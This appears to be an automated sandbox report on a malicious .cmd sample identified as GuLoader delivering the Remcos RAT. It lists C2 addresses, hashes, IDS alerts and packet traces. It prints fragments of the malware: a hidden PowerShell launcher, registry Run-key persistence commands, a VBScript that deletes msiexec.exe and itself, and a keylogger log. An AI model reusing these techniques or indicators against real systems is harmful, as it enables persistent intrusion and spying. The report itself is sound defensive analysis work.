                                                                                                                              unknown
                                                                                                                              https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59bhvF678.tmp.13.drfalse
                                                                                                                                unknown
                                                                                                                                http://www.ebuddy.commsiexec.exe, msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
IP               Domain              Country        ASN    ASN Name           Malicious
172.67.155.139   plieltd.top         United States  13335  CLOUDFLARENETUS    false
185.236.203.101  pelele.duckdns.org  Romania        9009   M247GB             true
178.237.33.50    geoplugin.net       Netherlands    8455   ATOM86-ASATOM86NL  false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1538407
Start date and time: 2024-10-21 08:33:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rIMG465244247443GULFORDEROpmagasinering.cmd
Detection: MAL
Classification: mal100.troj.spyw.evad.winCMD@22/14@8/3
EGA Information:
• Successful, ratio: 60%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 172
• Number of non-executed functions: 251
Cookbook Comments:
• Found application associated with file extension: .cmd
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 3272 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6852 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big: too many NtOpenFile calls found
• Report size getting too big: too many NtOpenKeyEx calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
02:33:59  API Interceptor  91x Sleep call for process: powershell.exe modified
07:34:38  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Gummicheckene %Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)
07:34:46  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Gummicheckene %Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)
                                                                                                                                            9IreEhm9Hk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 89.238.176.6
                                                                                                                                            ATOM86-ASATOM86NL1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            duEsmKBlGr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            lA0Z0vjXfA.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            SecuriteInfo.com.Variant.Ulise.323893.7366.1016.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            Ibnh3BCQSQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Documenti di spedizione.bat.exe | malicious | AgentTesla, GuLoader | 172.67.155.139
RFQ-KTE-07102024.pdf.scr | malicious | Snake Keylogger, VIP Keylogger | 172.67.155.139
rRFQ24201007_pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.155.139
http://heks.egrowbrands.com/lopsa/67057a2256a25_SwiftKey.exe | malicious | Unknown | 172.67.155.139
http://lide.omernisar.com/lopsa/66daf6d8ac980_PeakSports.exe | malicious | Unknown | 172.67.155.139
SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exe | malicious | Unknown | 172.67.155.139
SecuriteInfo.com.Win64.MalwareX-gen.7443.30781.exe | malicious | Unknown | 172.67.155.139
SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exe | malicious | Unknown | 172.67.155.139
SecuriteInfo.com.Win64.MalwareX-gen.7443.30781.exe | malicious | Unknown | 172.67.155.139
SecuriteInfo.com.Win64.DropperX-gen.18606.18356.exe | malicious | Unknown | 172.67.155.139
37f463bf4616ecd445d4a1937da06e19450707124374000811.exe | malicious | GuLoader | 172.67.155.139
450707124374000811.exe | malicious | GuLoader | 172.67.155.139
3507071243740008011.exe | malicious | GuLoader | 172.67.155.139
Unlock_Tool_2.3.1.exe | malicious | Vidar | 172.67.155.139
3507071243740008011.exe | malicious | GuLoader | 172.67.155.139
aZm1EZ2IYr.exe | malicious | Vidar | 172.67.155.139
Unlock_Tool_2.4.exe | malicious | Vidar | 172.67.155.139
JuyR4wj8av.exe | malicious | Stealc, Vidar | 172.67.155.139
SecuriteInfo.com.FileRepMalware.4445.21502.exe | malicious | Unknown | 172.67.155.139
yAkRyU2LPe.exe | malicious | Vidar | 172.67.155.139
No context
Process:C:\Windows\SysWOW64\msiexec.exe
File Type:data
Category:dropped
Size (bytes):234
Entropy (8bit):3.3360892128027286
Encrypted:false
SSDEEP:3:rhlKlM+Xl8HWlRlfzNeDl5JWRal2Jl+7R0DAlBG4moojklovDl6ALilXIkqoojk5:6lj82lD855YcIeeDAlS1gWAAe5q1gWAv
MD5:9386B1C4402A4A5BC1F3B75D06E8CD3C
SHA1:A511C21F5D2E1619E557EFAEE5C903D4A1F77DCF
SHA-256:BE9E30C21C21D0F7740687374E68C2FA9E0EA8E0898780F9BEDCCD9BF96832CF
SHA-512:5F646E052763F29F601EC8A664951868D04FB67056B0BD646533E99F0CDC9AA4324BD53A818C3246DF97DD4A0605BDC74BFC4B07A9E9F0CB15B20087378446AB
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview:....[.2.0.2.4./.1.0./.2.1. .0.2.:.3.4.:.4.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

Process:C:\Windows\SysWOW64\msiexec.exe
File Type:JSON data
Category:dropped
Size (bytes):956
Entropy (8bit):5.016616617248742
Encrypted:false
SSDEEP:12:tkTLJend6UGkMyGWKyGXPVGArwY3AoQasHuGvB+Arpv/mOAaNO+ao9W7iN5zzkwV:qpSdVauKyGX85MEBZvXhNlT3/7l1DYro
MD5:9220BE8AB34657C7535C5A2582857DC7
SHA1:2BE54CB6D990A4F9C6D6AE30A618EAB88F181634
SHA-256:0E97AB60A1FF8EECB241E186B7C690D4900E2922FBAE2125DA469EADEAAFD1F0
SHA-512:23D31D1370AE2F5663F5957BA204BC16EA15E0B7F37669D55E3BB14B594FAAAA782E52926CED9E5D87E915910DF48945D57B7CC04CF44C3C7CE095EFB4D3BE01
Malicious:false
Preview:{. "geoplugin_request":"155.94.241.186",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Dallas",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"623",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"32.8137",. "geoplugin_longitude":"-96.8704",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:modified
Size (bytes):8003
Entropy (8bit):4.840877972214509
Encrypted:false
SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:106D01F562D751E62B702803895E93E0
SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:false
Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1940658735648508
Encrypted:false
SSDEEP:3:Nlllul/nq/llh:NllUyt
MD5:AB80AD9A08E5B16132325DF5584B2CBE
SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
Malicious:false
Preview:@...e................................................@..........

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x57c24073, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):20447232
                                                                                                                                            Entropy (8bit):1.284655157496756
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:9D0BuPOVAnljKhBfvUDv2R+YN5cksBNHfstOF:PyA5JDe+
                                                                                                                                            MD5:BA38B8694AF7EB45B3D706AB369DBF7B
                                                                                                                                            SHA1:2E7EE506DB940B674A99DCD5E3B132F69E2E0087
                                                                                                                                            SHA-256:7252D8C5770669E392ACC996122DB3DC16E0409C4E0CEE6762928420D03487E1
                                                                                                                                            SHA-512:AED7AA222722586C4F24A03259353480B0E4ACB6473A8F4FBD8CA1967A243A4678603279705659B97131510D24252A6C0807B75633000A1165EB709778295343
                                                                                                                                            Malicious:false
Process: C:\Windows\SysWOW64\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 322
Entropy (8bit): 3.41606619423634
Encrypted: false
SSDEEP: 6:xPW+YR4lA2QOm3OOZgypjRQIQMlziKJRBgU9n+SkyGkRkJ7jlAan9YKJRB4y0aGH:xQ4lA2++ugypjBQMB3D9+UcSY9Z/0ait
MD5: 53E961FCBE2540B967EFCB5E6C3FD316
SHA1: 252BBD1E644FF0124E2039EEDE8A955D5405A98C
SHA-256: F9A970482BAA86264FAEF6C210212B65901857DB17241D5C176B6789EE620F42
SHA-512: 5BBF4FDCBBB403B7E963A91D43AA425EBAC5CFAF6E81E592162B9D4D071150C8327F89922F719C25A5CC378AA1E82E043E1F9FEDA4D78D6F3CDCA9F8CDC73700
Malicious: true
Preview (UTF-16LE, shown decoded):
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile "C:\Windows\System32\msiexec.exe"
fso.DeleteFile(Wscript.ScriptFullName)

Process: C:\Windows\SysWOW64\msiexec.exe
File Type: Unicode text, UTF-16, little-endian text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Preview: ..

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6221
Entropy (8bit): 3.7352210811065576
Encrypted: false
SSDEEP: 48:jDe1f0LPr3C4U28Aj1ukvhkvklCywXmd+TxflRySogZo+eTxfl4ySogZo61:nM033CxHA4kvhkvCCtRTxfvH+TxfsHx
MD5: 5E420524CBC5E6DBC264C761309493CF
SHA1: E55A3785E749D512D83442FCAE0DAC94BCAEF06F
SHA-256: ACC6EE667F84A91C16F24E82FF6381E90BA1ED6EC8586F9153C4B59445AFDB7E
SHA-512: 3D7345E66515C3316DE85201E329F565AFEAFE6723271FB150594E956AAB36E5DCF526E2281E5F92C852D8984EF51178C41C939420E76268F212D0F68170488B
Malicious: false
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 436336
Entropy (8bit): 5.8484588848574
Encrypted: false
SSDEEP: 6144:CMHa7ZB93AaROMWgvuh/eGV8EtKJg2DbS0mBliEfczyf7thB93k9I:Csa7F3rROMw/ehmKSOSTBlXcwJh33k9I
MD5: CE429A8BB4D6FE008BB30E20337DAB1A
SHA1: AAB03694AA2D8A456DD3FC03D7B1B76E6BCFBAD4
SHA-256: 2757CC9A4254063D89899EA0013B5D7F12C76F8C68C776AC6B00B8C135E53746
SHA-512: FBB466962FCBCEFF06DAA0266C37C43D1A124AC991AEA0B7DD5FE6FB0F0D93BF2DFBFF48005E5F622F8A54F08E3F07B4000E898683FFCF1BC0249EC846EBB72D
Malicious: false
File type: ASCII text, with very long lines (6138), with no line terminators
Entropy (8bit): 5.376413633232492
TrID:
File name: rIMG465244247443GULFORDEROpmagasinering.cmd
File size: 6'138 bytes
MD5: d4a5745ec008932bec834b981d31bd8f
SHA1: c57e44498a52b6aa60e55c19a16cb026104fa19c
SHA256: 40b46bae5cca53c55f7b7f941b0a02aeb5ef5150d9eff7258c48f92de5435216
SHA512: 7de89b88dbba6d2310ef79bad8bc6c82ec12b0e8c0abfc0229f3ca4765606c1c2f342cd996d63882e7e0aab4fd1f3d15d016108831e286d7e3aa26e09aef454f
SSDEEP: 96:zX+gBYcM44kNPsQa/+2bBRpgccIgEyHa9a6ONt/3nU56D+9EFA/W8v8OS7x+LSKv:T+gKc2k6Qa/cJJNd3n3wR+B1Kv
TLSH: 31C14A4D5A7D223C0D96C4186AA79F2F0F4449953C0CB5F3B039F1FE93C198A4A1C76A
File Content Preview: start /min powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paede
Icon Hash: 9686878b929a9886
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-21T08:34:38.838096+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49737 | 172.67.155.139 | 443 | TCP
2024-10-21T08:34:49.174652+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49738 | 185.236.203.101 | 51525 | TCP
2024-10-21T08:34:51.151958+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49739 | 185.236.203.101 | 51525 | TCP
2024-10-21T08:34:51.998973+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.4 | 49740 | 178.237.33.50 | 80 | TCP
2024-10-21T08:34:56.948809+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49741 | 185.236.203.101 | 51525 | TCP
2024-10-21T08:34:56.968527+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49742 | 185.236.203.101 | 51525 | TCP
                                                                                                                                              Oct 21, 2024 08:34:02.759625912 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.759696007 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.759707928 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.759803057 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.759850979 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.759861946 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.759996891 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.760055065 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.760065079 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.799585104 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.799622059 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.846293926 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.872673988 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.876250029 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.876327038 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.876346111 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.876461983 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.876517057 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.876529932 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.876857996 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.876924992 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.876935959 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.877022982 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.877073050 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.877093077 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.877120972 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.877177000 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.877547979 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.924417973 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.924439907 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.924536943 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.924595118 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.924606085 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.971293926 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.990061045 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.993921041 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994002104 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994108915 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.994121075 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994146109 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994172096 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.994268894 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994324923 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.994339943 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994388103 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994389057 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.994410038 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994461060 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.042150021 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.042171001 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.042243958 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.042263031 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.042314053 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.042327881 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.096302032 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.111408949 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.111432076 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.111552954 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.111607075 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.111630917 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.111670017 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.111676931 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.111732006 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.111742973 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.111793041 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.112445116 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.112462044 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.112512112 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.158885002 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.158891916 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.159766912 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.159840107 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.159845114 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.159856081 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.159888983 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.159893990 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.159931898 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.239880085 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.239917994 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.239964962 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.240024090 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.240092039 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.240104914 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.240149975 CEST49730443192.168.2.4172.67.155.139
